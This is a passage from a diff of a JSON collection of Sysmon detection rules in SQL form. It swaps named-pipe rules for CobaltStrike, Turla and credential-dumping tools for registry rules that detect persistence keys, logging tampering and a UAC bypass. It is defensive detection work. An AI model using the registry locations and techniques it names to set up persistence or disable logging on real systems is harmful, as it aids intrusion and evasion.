'\\'))" ], - "filename": "proc_creation_win_mshta_javascript.yml" + "filename": "registry_set_persistence_app_paths.yml" }, { - "title": "Malicious Named Pipe", - "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", - "status": "test", - "description": "Detects the creation of a named pipe used by known APT malware", - "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", + "title": "Potential AutoLogger Sessions Tampering", + "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", + "status": "experimental", + "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE 
'\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_namedpipes.yml" + "filename": "registry_set_disable_autologger_sessions.yml" }, { - "title": "Cred Dump-Tools Named Pipes", - "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", + "title": "Registry Persistence via Explorer Run Key", + "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", "status": "test", - "description": "Detects well-known credential dumping tools execution via specific named pipes", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((Details LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR Details LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" ], - "filename": "pipe_created_cred_dump_tools_named_pipes.yml" + "filename": "registry_set_susp_reg_persist_explorer_run.yml" }, { - "title": "Koh Default Named Pipes", - "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "title": "Office Security Settings Changed", + "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", "status": "experimental", - "description": "Detects creation of default named pipes used by the Koh tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. 
(see references)", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1528", - "attack.t1134.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Valid Macros and/or internal documents" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" ], - "filename": "pipe_created_koh_default_pipe.yml" + "filename": "registry_set_office_security.yml" }, { - "title": "ADFS Database Named Pipe Connection", - "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", - "status": "test", - "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Set TimeProviders DllName", + "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", + "status": "experimental", + "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1005" + "attack.persistence", + 
"attack.privilege_escalation", + "attack.t1547.003" ], "falsepositives": [ - "Processes in the filter condition" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR Image LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR Image LIKE '%\\\\tssdis.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" ], - "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" + "filename": "registry_set_timeproviders_dllname.yml" }, { - "title": "EfsPotato Named Pipe", - "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "title": "NET NGenAssemblyUsageLog Registry Key Tamper", + "id": "28036918-04d3-423d-91c0-55ecf99fb892", "status": "experimental", - "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. 
fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" ], - "filename": "pipe_created_efspotato_namedpipe.yml" + "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" }, { - "title": "CobaltStrike Named Pipe Patterns", - "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", + "title": "Enabling COR Profiler Environment Variables", + "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", "status": "test", - "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", - "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", + "attack.persistence", "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion", + "attack.t1574.012" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" + ], 
+ "filename": "registry_set_enabling_cor_profiler_env_variables.yml" + }, + { + "title": "Potential Attachment Manager Settings Attachments Tamper", + "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "status": "experimental", + "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" ], "falsepositives": [ - "Chrome instances using the exact same pipe name \"mojo.something\"" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName 
LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND Details = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" ], - "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" + "filename": "registry_set_policies_attachments_tamper.yml" }, { - "title": "PsExec Tool Execution From Suspicious Locations - PipeName", - "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", + "title": "Potential Persistence Via DLLPathOverride", + "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", "status": "experimental", - "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. 
Which could indicate that the tool is being used in an attack", + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.persistence" ], "falsepositives": [ - "Rare legitimate use of psexec from the locations mentioned above" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" ], - "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" + "filename": "registry_set_persistence_natural_language.yml" }, { - "title": "DiagTrackEoP Default Named Pipe", - "id": "1f7025a6-e747-4130-aac4-961eb47015f1", + "title": "Disable Sysmon Event Logging Via Registry", + "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", "status": "experimental", - "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects changes in 
Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", + "author": "B.Talebi", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate driver altitude change to hide sysmon" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '%thisispipe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" ], - "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + "filename": "registry_set_change_sysmon_driver_altitude.yml" }, { - "title": "Turla Group Named Pipes", - "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "title": "Winlogon Notify Key Logon Persistence", + "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", "status": "test", - "description": "Detects a named pipe used by Turla group samples", - "author": "Markus Neis", + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", + "author": "frack113", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1106" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' 
ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "pipe_created_apt_turla_namedpipes.yml" + "filename": "registry_set_winlogon_notify_key.yml" }, { - "title": "CobaltStrike Named Pipe Pattern Regex", - "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", + "title": "Execution DLL of Choice Using WAB.EXE", + "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", "status": "test", - "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", - "author": "Florian Roth (Nextron Systems)", + "description": "This rule detects that the path to the DLL written in the registry is different from the default one. 
Launched WAB.exe tries to load the DLL from Registry.", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (Details LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" ], - "filename": "pipe_created_mal_cobaltstrike_re.yml" + "filename": "registry_set_wab_dllpath_reg_change.yml" }, { - "title": "WMI Event Consumer Created Named Pipe", - "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", - "status": "test", - "description": "Detects the WMI Event Consumer service scrcons.exe creating a 
named pipe", - "author": "Florian Roth (Nextron Systems)", + "title": "Persistence Via Hhctrl.ocx", + "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "status": "experimental", + "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1047", - "attack.execution" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" ], - "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" + "filename": "registry_set_hhctrl_persistence.yml" }, { - "title": "CobaltStrike Named Pipe", - "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", + "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", + "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", "status": "test", - "description": "Detects the creation of a named pipe as used by CobaltStrike", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' 
ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND Details LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" ], - "filename": "pipe_created_mal_cobaltstrike.yml" + "filename": "registry_set_uac_bypass_winsat.yml" }, { - "title": "Suspicious Network Connection Binary No CommandLine", - "id": "20384606-a124-4fec-acbb-8bd373728613", - "status": "experimental", - "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", + "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND Details IN ('0', 'DWORD (0x00000000)'))))" ], - "filename": "net_connection_win_susp_binary_no_cmdline.yml" + "filename": "registry_set_dot_net_etw_tamper.yml" }, { - "title": "Remote PowerShell Session (Network)", - "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", - "status": "test", - "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Adwind RAT / JRAT - Registry", + "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "status": "experimental", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.t1059.005", + "attack.t1059.007" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND Details LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" + ], + "filename": "registry_set_mal_adwind.yml" 
